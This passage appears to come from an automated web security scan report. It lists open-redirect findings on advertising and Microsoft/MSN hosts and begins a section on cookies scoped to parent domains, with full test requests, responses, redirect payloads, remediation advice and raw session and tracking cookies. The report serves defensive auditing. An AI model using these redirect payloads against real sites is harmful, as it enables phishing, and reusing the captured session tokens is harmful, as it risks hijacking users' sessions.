GET /rss.aspx?s=143&p=18 HTTP/1.1 Host: rss.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 Content-Type: text/html; charset=utf-8 Akamai: True Cache-Control: private, max-age=900 Date: Sun, 30 Jan 2011 02:18:31 GMT Connection: close Connection: Transfer-Encoding Akamai: True Content-Length: 263787
GET / HTTP/1.1 Host: www.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 01:25:49 GMT Server: Microsoft-IIS/6.0 Server: Static1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 Accept-Ranges: bytes Cache-Control: public, s-maxage=600 Expires: Sun, 30 Jan 2011 01:35:49 GMT Last-Modified: Sat, 29 Jan 2011 23:54:38 GMT ETag: "1CBC00FE3423300" Content-Type: text/html Content-Length: 99726
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>Scout.com - College and High School Football, Basketball, Recruiti ...[SNIP]... <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNzQyNzE0MDlkZA==" /> ...[SNIP]...
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:
Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.
If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:
The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.
The application should use absolute URLs for all of its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.
The value of the admeld_callback request parameter is used to perform an HTTP redirect. The payload http%3a//a9b5c9e7d56de789a/a%3fhttp%3a//tag.admeld.com/match was submitted in the admeld_callback parameter. This caused a redirection to the following URL:
GET /amcm.ashx?admeld_adprovider_id=1&admeld_call_type=redirect&admeld_callback=http%3a//a9b5c9e7d56de789a/a%3fhttp%3a//tag.admeld.com/match HTTP/1.1 Host: cmap.am.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 30 Jan 2011 02:07:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV Location: http://a9b5c9e7d56de789a/a?http://tag.admeld.com/match?admeld_adprovider_id=1&external_user_id=0&expiration=1296940074 Cache-Control: private, max-age=3600 Expires: Sun, 30 Jan 2011 03:07:54 GMT Content-Length: 0
15.2. http://developer.windowsphone.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://developer.windowsphone.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .aef13bb7348a0a2ce/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
http://create.msdn.com?.aef13bb7348a0a2ce/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
Request
GET /?.aef13bb7348a0a2ce/=1 HTTP/1.1 Host: developer.windowsphone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: http://create.msdn.com?.aef13bb7348a0a2ce/=1 Server: Microsoft-IIS/7.0 p3p: CP="NOI CURa TAIa INT" Date: Sun, 30 Jan 2011 16:30:29 GMT Connection: close Content-Length: 167
<head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="http://create.msdn.com?.aef13bb7348a0a2ce/=1">here</a></body>
15.3. http://go.microsoft.com/fwlink/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://go.microsoft.com
Path:
/fwlink/
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a8f7c1e946cdd6794/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
http://www.redacted?.a8f7c1e946cdd6794/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
HTTP/1.1 302 Found Cache-Control: private Content-Length: 157 Content-Type: text/html; charset=utf-8 Expires: Sun, 30 Jan 2011 16:40:28 GMT Location: http://www.redacted?.a8f7c1e946cdd6794/=1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 16:41:27 GMT
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://www.redacted?.a8f7c1e946cdd6794/=1">here</a>.</h2> </body></html>
15.4. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://ib.adnxs.com
Path:
/getuid
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload http%3a//aefdf45cccfdf6a24/a%3f1 was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
http://aefdf45cccfdf6a24/a?1=1
Request
GET /getuid?http%3a//aefdf45cccfdf6a24/a%3f1=1 HTTP/1.1 Host: ib.adnxs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anj=Kfu=8fG6Q/DYS3+0s]#%2L_'x%SEV/i#+93=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]-sVkK=XaP9JgIyKY?AZ2?cN2AYU+6+y:OCAzxnxZ]T%isfEi1j6e[?U_=%p.dR$pzM:4KKhq.Wf[V?>]Uq'j<LI7Z3NZg<?)dNKuDMOC67s9kowxd<'fQ6TwL.7!@Nno(bTV'J<hKMSzM(Q66u2x%X_(L:SlM('INuCClbQ^7w=#?jImiI0aU8E.A1>N#b#Qdqc@TwKrL$L2pv>3u[KE^pd=S(K$r@Fp>9H; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;
Response
HTTP/1.1 302 Moved Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 31-Jan-2011 02:08:30 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 30-Apr-2011 02:08:30 GMT; domain=.adnxs.com; HttpOnly Location: http://aefdf45cccfdf6a24/a?1=1 Date: Sun, 30 Jan 2011 02:08:30 GMT Content-Length: 0 Connection: close
15.5. http://jp.video.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://jp.video.redacted
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .ab9ee8914f626bc99/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
Request
GET /?.ab9ee8914f626bc99/=1 HTTP/1.1 Host: jp.video.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 02:09:18 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Machine: S02 Location: http://video.redacted?mkt=ja-jp&.ab9ee8914f626bc99/=1 Cache-Control: private Content-Length: 0
15.6. http://latino.video.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://latino.video.msn.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .aee7ddd5962f48d29/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
Request
GET /?.aee7ddd5962f48d29/=1 HTTP/1.1 Host: latino.video.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 02:09:17 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Machine: L02 Location: http://video.redacted?mkt=es-us&brand=latino&.aee7ddd5962f48d29/=1 Cache-Control: private Content-Length: 0
15.7. http://ninemsn.video.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://ninemsn.video.msn.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .af86b8eda8e8b4b2a/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
Request
GET /?.af86b8eda8e8b4b2a/=1 HTTP/1.1 Host: ninemsn.video.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 02:17:26 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Machine: S02 Location: http://video.redacted?mkt=en-au&brand=ninemsn&.af86b8eda8e8b4b2a/=1 Cache-Control: private Content-Length: 0
The value of the trg request parameter is used to perform an HTTP redirect. The payload http%3a//a24bb191d3f37d4f6/a%3f was submitted in the trg parameter. This caused a redirection to the following URL:
http://a24bb191d3f37d4f6/a?
Request
GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http%3a//a24bb191d3f37d4f6/a%3f HTTP/1.1 Host: r1-ads.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Location: http://a24bb191d3f37d4f6/a? Cache-Control: private, max-age=0, no-cache Expires: Sun, 30 Jan 2011 02:18:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 144 Vary: Accept-Encoding Date: Sun, 30 Jan 2011 02:18:24 GMT Connection: close Set-Cookie: C2=wpMRNJpwIg02FqECdbdhKhwUwXoSI8Y4FqECYTehKhQ3gZoSIQTnGqECF2phKhAohXoSIYZ4FqECKGehKhwohXoSIca4FqECiGehKhQshXoSwOYAM/oRhI7YCwAoGj0r1RQcKasLGK2AI9YRoN53EkL3F+ygPXw6TV4UsumB/0mBhca7GIaWG4frMew41Z0Ckq1B6bjBLq6bDwWZGj6r4jQsMagJwaHCW8oBm0I9IsfzFeysNiQQoaoSCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:24 GMT; path=/ Set-Cookie: F1=BAnyE1kAAAAAdVyCAEAAOEA; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:24 GMT; path=/ Set-Cookie: ROLL=v5Q2Y0M/d+zqGNHXUFc390yISxIi0bPhr7fCKadF7gTOdF6VqYmq8tecT61vdkvTdqiqdic8fskwW3tYTUArYRl+0nSSt+7FW6iaoRF!; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:24 GMT; path=/ Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click Set-Cookie: 6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://a24bb191d3f37d4f6/a?">here</a>.</h2> </body></html>
The value of the trg request parameter is used to perform an HTTP redirect. The payload http%3a//aff678c0f8818bcd6/a%3fhttp%3a//b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366%3f%3bord%3d860849269%3f was submitted in the trg parameter. This caused a redirection to the following URL:
GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http%3a//aff678c0f8818bcd6/a%3fhttp%3a//b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366%3f%3bord%3d860849269%3f HTTP/1.1 Host: r1-ads.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=YnQIx8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGrgJkH34AWEQ50klrods4GEQpslbnta1jyi06DY4goRuq7lNfytkpMGnkn13F/thphT9BVrj4TEB4tA8HhyePTdrXAHCI5I8ZJSPfosItSm2KGbW4bMg1diWeoat4pBWAsS0xuVBChK5UAQMdxKbZkoze5s76NIPb4CdQ/w8CXYuay4+lyQWK0GVSchMSu3n3ygrt1ByPVHFBx+JMtaedPpgtfj+pBX0truazR7M6ZuK9sVxhFZZ4MxpJbJc+KhQNAB0IaOZcfXUiSdOO0D8u4hyiFT/96RHBwMCa4UuiFfHFuaQQKkvI0Ica251TOMxGv0hzcvsl8LyNHqKFpTNKVBAUdzcbw/CzAvQzbu5wzg9ZCSgMt4q9GO44FPGyXSU1PH45OxD5VJciBItw68hvpOMeNkZCp6Oah7P40wy94BpsD33jn2wByhMmp+2rVS0xYYdyQ0dnp+0oE+uA!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;
Response
HTTP/1.1 302 Moved Temporarily Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Location: http://aff678c0f8818bcd6/a?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Cache-Control: private, max-age=0, no-cache Expires: Sun, 30 Jan 2011 02:18:31 GMT Content-Type: text/html; charset=utf-8 Content-Length: 361 Vary: Accept-Encoding Date: Sun, 30 Jan 2011 02:18:31 GMT Connection: close Set-Cookie: C2=3pMRNJpwIg02FqECdbdhKhwUwXoSI8Y4FqECYTehKhQ3gZoSIQTnGqECF2phKhAohXoSIYZ4FqECKGehKhwohXoSIca4FqECiGehKhQshXoSwOYAM/oRhI7YCwAoGj0r1RQcKasLGK2AI9YRoN53EkL3F+ygPXw6TV4UsumB/0mBhca7GIaWG4frMew41Z0Ckq1B6bjBLq6bDwWZGj6r4jQsMagJwaHCW8oBm0I9IsfzFeysNiQQoaoSCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:31 GMT; path=/ Set-Cookie: F1=BcnyE1kAAAAAdVyCAEAAOEA; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:31 GMT; path=/ Set-Cookie: ROLL=v5Q2Y0M/d+zqGNHXUFc390yISxIi0bPhr7fCKadF7gTOdF6VqYmq8tecT61vdkvTdqiqdic8fskwW3tYTUArYRl+0nSSt+7FW6iaoRF!; domain=advertising.com; expires=Tue, 29-Jan-2013 02:18:31 GMT; path=/ Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click Set-Cookie: 6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://aff678c0f8818bcd6/a?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/ ...[SNIP]...
15.10. http://video.fr.sympatico.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://video.fr.sympatico.redacted
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a6103e627b507d6ae/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
Request
GET /?.a6103e627b507d6ae/=1 HTTP/1.1 Host: video.fr.sympatico.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 03:04:26 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Machine: S02 Location: http://video.redacted?mkt=fr-ca&.a6103e627b507d6ae/=1 Cache-Control: private Content-Length: 0
15.11. http://video.sympatico.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://video.sympatico.redacted
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a94ca25af6512fea/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Remediation detail
When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.
Request
GET /?.a94ca25af6512fea/=1 HTTP/1.1 Host: video.sympatico.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 30 Jan 2011 03:04:45 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Machine: S02 Location: http://video.redacted?mkt=en-ca&brand=sympatico&.a94ca25af6512fea/=1 Cache-Control: private Content-Length: 0
16. Cookie scoped to parent domainpreviousnext There are 302 instances of this issue:
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: msn.whitepages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: silverlight.codeplex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId=sav3egusogls5mked5qq0jiw; domain=.codeplex.com; path=/; HttpOnly X-AspNetMvc-Version: 3.0 P3P: CP="NON DSP COR ADM CUR DEV TAI OUR IND NAV PRE STA" X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:26:30 GMT Content-Length: 47853
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t/v1/imp?%25&migAgencyId=188&migSource=adsrv2&migTrackDataExt=2426847;58143061;234278507;40142779&migRandom=5845715&migTrackFmtExt=client;io;ad;crtv HTTP/1.1 Host: t.mookie1.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; 